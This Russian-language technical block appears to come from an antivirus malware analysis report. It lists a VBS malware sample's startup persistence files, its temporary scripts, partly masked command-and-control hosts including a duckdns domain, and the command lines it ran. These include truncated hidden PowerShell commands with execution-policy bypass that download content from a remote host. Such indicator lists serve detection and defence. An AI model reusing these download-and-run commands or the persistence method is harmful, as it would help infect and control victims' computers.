Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\driversound.vbs
- %APPDATA%\microsoft\windows\start menu\programs\startup\smartphone.vbs
- %TEMP%\r.vbs
- %TEMP%\l.vbs
- '1.###4top.net':443
- 'pa###bin.com':443
- 'ga#####ro.duckdns.org':2017
- 'ga#####ro.duckdns.org':2018
- DNS ASK 1.###4top.net
- DNS ASK ga#####ro.duckdns.org
- DNS ASK pa###bin.com
- '<SYSTEM32>\wscript.exe' "%TEMP%\r.vbs"
- '<SYSTEM32>\wscript.exe' "%TEMP%\l.vbs"
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://1.top4to...